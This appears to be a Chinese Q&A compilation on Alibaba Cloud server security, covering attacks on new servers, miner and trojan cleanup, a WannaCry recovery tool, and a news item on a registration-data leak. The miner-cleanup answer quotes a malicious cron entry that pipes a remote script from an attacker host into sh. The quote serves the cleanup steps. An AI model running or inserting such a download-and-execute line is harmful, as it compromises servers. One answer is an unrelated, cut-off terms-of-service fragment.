阿里云服务器安全事件

⑴ 我们公司想购买一台阿里云服务器，做一个服务内部的平台，会被经常攻击吗

摘要 你好，选择任何一家云服务商的服务器都有被攻击的可能，阿里云也不例外，是否会遭到攻击与所选商家关系不大，而主要看你的网站或应用性质。阿里云服务器被攻击的用户也屡见不鲜，只能在日常经常维护管理。

⑵ 阿里云服务器总是被攻击,基本上刚买就会被攻击,是为什么

归属于阿里云服务器的ip是有范围值的。
阿里属于比较大型的服务器提供商，云主机服务器租用量较大。
有可能攻击并不是针对你的，而是之前别的云主机使用了这个ip，然后退用了云主机后ip重新归属，正好被你用上了。所以就一租用就被攻击了。
服务器和网站被攻击的话，建议检查下服务器的系统日志和网站运行的日志，分析确定下是受到了什么类型的攻击，然后服务器是哪个调解下相应的安全策略来进行防御。
也可以安装安全狗之类的防护软件来进行防御。
服务器安全狗主要保护服务器免遭恶意攻击，包括DDOS、ARP防火墙、远程桌面守护、端口保护、网络监控等。
网站安全狗主要保护服务器上网站的安全，包括网马挂马扫描、SQL注入防护，CC攻击防护，资源保护等。
两者防护方向不同。建议结合使用可以让保护更全面。
在防御的同时，可以查看防护日志，了解服务器和网站受到的是什么类型的攻击，然后针对攻击类型来调节防护规则，可以更为有效地进行防御。

⑶ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

⑷ 阿里云服务器检测说有木马，但具体是不是真的，请赐教。

看上去像是，因为我观察到服务器中木马的一种同样的现象，就是伪装成所谓的正常文件来欺骗过用户的眼睛。（例如图中的 /etc/init.d/selinux这种与服务器日常运行稳定不太相关的东西是被替换的高发文件）
同样，图中下面提到的/usr/bin/bsd-port 也并不是linux本来就有的东西（如果你没有安装过），这的确可疑。
赶紧上服务器删文件去吧，这确实是中木马了。

⑸ 阿里云云盾wannacry勒索加密文件恢复工具怎么使用

从5月12日爆发至今，名为WannaCry的勒索病毒让全球数十万Windows计算机中招，黑客将用户计算机中的重要文件实施加密，并索要赎金解锁。这种情况如果发生在企业服务器当中，那么将带来严重损失。

对此，阿里云安全团队经过不懈努力研究，终于找到解救被WannaCry病毒劫持的计算机的办法。

5月20日，阿里云安全团队向云上、云下服务器用户开放勒索病毒“一键解密和修复”工具。经过实际测试，如果被勒索后未重启操作系统，该工具可以恢复已被WannaCry勒索病毒加密的文件。

阿里云建议，在勒索病毒“中招后”，不要马上关闭、重启操作系统，也不要去手工查杀病毒，直接使用该修复工具尝试恢复数据。

软件名称：阿里云云盾勒索病毒专杀工具(WannaCry文件恢复工具) v1.0 中文绿色版(附使用教程)软件大小：0.97MB更新时间：2017-05-22
一、适用范围

该工具适用于云上、云下Windows服务器操作系统用户。

操作系统版本包括：Windows Server 2003、Windows Server 2008。

二、工作原理及研究基础
本次发布的修复工具基于wannakiwi项目的研究成果：既通过搜索内存中的数据，获取解密的关键素数来进行数据解密。

阿里云安全团队在此研究基础上，进行调试和封装，让工具简单易用。

三、如何恢复

请按以下步骤进行操作：

1、按照文末给出的链接，下载修复工具到被加密的服务器或PC机器上。

2、双击运行，如下图所示：

3、点击“恢复文件”按钮，执行文件恢复功能，期间执行时间会较长，请耐心等待。

4、恢复数据完毕后，点击“清除病毒”按钮，清理掉蠕虫病毒程序及服务。

三、注意事项

在大多数情况下，加密的文件可以被成功恢复。

也有因内存数据被二次写入，覆盖原有加密状态时的数据，导致数据恢复不成功的案例。

这是因为，该工具通过暴力搜索内存中的数据，获取解密的关键素数来进行数据解密。一旦重启或手工查杀会导致该数据被覆盖，则永久无法直接解密。

不过，如果使用该工具时，出现数据解密失败，不会对系统造成任何影响。

此外，用户也可以选择使用磁盘数据恢复软件来尝试恢复数据。

⑹ 阿里云服务器显示异地登陆，阿里云可靠吗还敢用吗

阿里云的安全你不用怀疑，如果异地登录，可能是密码泄漏了，建议修改密码。另外阿里云的ip有时候有误报，所以你不用紧张。做好网站数据备份~

⑺ 请教：阿里云报出的安全威胁，我找不到应如何处理

理解云盾态势感知服务提供的安全事件和安全威胁信息仅作为您评估安全风险和做出安全决策的参考，您基于云盾态势感知服务进行的任何行为的风险和后果由您自行承担。4 知识产权4.1 您应保证提交阿里云的素材、对阿里

⑻ 阿里云服务器太不安全了，老是被攻击，工作人员就负责把服务器给我关了

阿里云现在不比以前了!服务没有以前那么好了！提交一个工单跟你玩了7天，关键是问题还没解决，最后的答复是就是要你备份好文件，重装系统。最可气的就是一个工单换了好几个人跟只能要他联系你。10分钟的事情硬是搞个3-5天。----以上是我亲身经历的！要工单截图我都可以给你。

建议

远离大平台:

1，客户多别人照顾不了你这样的小客户。

2，阿里云向别人说的没有防御系统都是炒房子一样过来这阵风基本上也就拜拜了。

选择适合自己的平台

1，如果是公司网站可以选择一些像网络云，华为云，腾讯云的代理机构。因为他要赚钱必须把你当上帝。服务也及时。还会免费的教你怎么怎么弄。

⑼ 阿里云传来坏消息，未经用户许可泄露信息，滴滴事件重演

在滴滴事件发生之后，国内所有互联网公司都加大了对用户信息安全保障的重视程度。因为国内对滴滴采取的行动，让它们都感到了一阵后怕，谁也不想变成下一个“滴滴”。

但就在8月23日这天，阿里云传来坏消息，未经用户许可泄露信息，让很多人都表示，难道滴滴事件要重演？那么这究竟是怎么回事呢？阿里云为什么会泄露用户信息？

在回答这些问题之前，先来了解一下阿里云，毕竟很多人都不知道阿里云到底是干什么的。公开资料显示，阿里云成立于2009年，是全球领先的云计算以及人工智能 科技 公司，致力于为客户提供安全、可靠的计算和数据处理能力。

而截至目前，阿里云已经成为了国内排名第一，全球排名第三的云服务商，客户遍及全球。像大家熟知的12306购票网站，之所以能够流畅地运行下去，有很大一部分原因都来自于阿里云的鼎力支持，还有中国联通、中石化等公司，都与阿里云建立了紧密的合作关系。

毫不夸张地说，在如今这个信息时代，阿里云发挥出了重要的作用，基本上各个领域都能看到它的身影，例如上次东京奥运会的转播，也有阿里云的参与。而且为了保证能够给客户提供更好的服务，阿里云在全球各地都建有数据中心，布局非常完善。

但值得一提的是，云计算和云服务也存在一定的风险，将数据存储在云服务器里面，同样会出现泄漏的情况。而就在8月23日这天，浙江省通信管理局在一份对投诉人的答复函中明确表示，已核实阿里云未经用户许可将留存的注册信息泄露给第三方公司。

也就是说，用户留存在阿里云中的注册信息，被阿里云泄漏给了第三方公司，目前浙江省通信管理局已责令阿里云改正。这对于阿里云来说，无疑是一个坏消息，身为国内最大的云服务商，如果连用户的信息安全都保障不了，还怎么留住客户？

而且这起事件原本是发生在2019年11月份，但浙江省通信管理局直到今年7月份才给投诉者答复，如果不是8月23日被曝光了，人们还不知道原来阿里云也存在信息泄露的风险。

按理说，用户把注册信息留存在阿里云，是对它的信赖和认可，但没想到阿里云辜负了用户的信任，在未经用户同意的情况下，将注册信息泄露给了第三方公司。虽然目前还不知道这些注册信息重不重要，但只要是涉及到信息安全的问题，都不能掉以轻心。

再加上现在阿里云已经覆盖到了各个领域，小到个人的隐私信息，大到国家的关键数据，阿里云都扮演了一个重要的角色。假如阿里云不把信息安全放在心上，那么用户将不会再信赖它，客户也会寻找其它的云服务商，毕竟国内又不是只有阿里云。

至于滴滴事件将重演，这种说法就有点太严重了，阿里云泄露用户信息，只是个别情况，只要认真整改就行了，不会像滴滴那样，受到国内七大部门的联合审查。但是这两起事件的性质是一样的，都是关于用户信息安全保障，只不过阿里云没有滴滴那么严重。

就目前来看，滴滴事件仍然没有一个明确的结果，谁也不知道它到底做了什么。但有一点可以肯定的是，在事件发生之后，滴滴的市值已经接近腰斩，基本不可能再回到巅峰时期，那些投资者们也是损失惨重。

更有甚者，如果滴滴被证实出卖了一些重要信息，那么它或许会从美国退市，回归私有化，这便是它罔顾信息安全保障的下场。想必滴滴在上市之前也没有料到，原本一切顺利的计划，却因为信息安全问题被国内抓到了把柄，而且还没法为自己争辩。

现在阿里云也出现了和滴滴一样的情况，尽管不如它严重，但也要引起重视，因为一个用户的信息泄露，就代表有很多用户都存在同样的风险。阿里云必须给用户一个满意的答复，不然的话这起事件将会成为它的污点，不利于接下来的发展。

当然了，用户的信息被泄露，也有可能不是阿里云的本意，毕竟有那么多数据和信息，阿里云不可能每一个都照顾到。但不管怎样，既然这是阿里云的业务，只要出现了问题，阿里云就应该承担责任，用户也不想找不到源头。

事实上，在滴滴事件曝光之后，国内已经明显加强了对互联网行业的管控力度，尤其是信息安全这块儿，更是受到了前所未有的重视。然而就如今的局面来看，国内的互联网公司们，还没有真正意识到问题的严重性，尤其是那些巨头，依旧在我行我素。

如果继续这样发展下去，滴滴绝对不会是最后一个接受审查的互联网公司，一旦其它企业也发生了类似的情况，国内同样会展开全面调查，到时候滴滴事件就真的要重演了。这显然是国内和广大用户都不想看到的结果，互联网行业应该早做打算。

所以说，别看阿里云未经用户许可泄露注册信息这件事闹得不是很大，现在也没多少人关注，但是却反映出了一些值得深思的问题。阿里云本身是阿里旗下的产业，而阿里又是国内最大的互联网公司之一，连它都规范不了自己的行为，何谈其它企业？

好在国内已经采取了相应的措施，今年9月1日过后，《网络产品安全漏洞管理规定》这项新规就会正式开始实施，国内各大互联网巨头都必须要遵守。正所谓没有规矩不成方圆，相信在国内出手后，类似于滴滴的事件就会明显减少，直到彻底消失。

综上所述，阿里云传来的坏消息，同样是关于用户信息安全的，未经许可泄露用户信息，这种行为显然是错误的。希望今后阿里云能认真整改，积极吸取教训，不要重蹈滴滴的覆辙，不然就算再强大，也会有没落的一天。

对此，你们怎么看呢？欢迎留言和转发。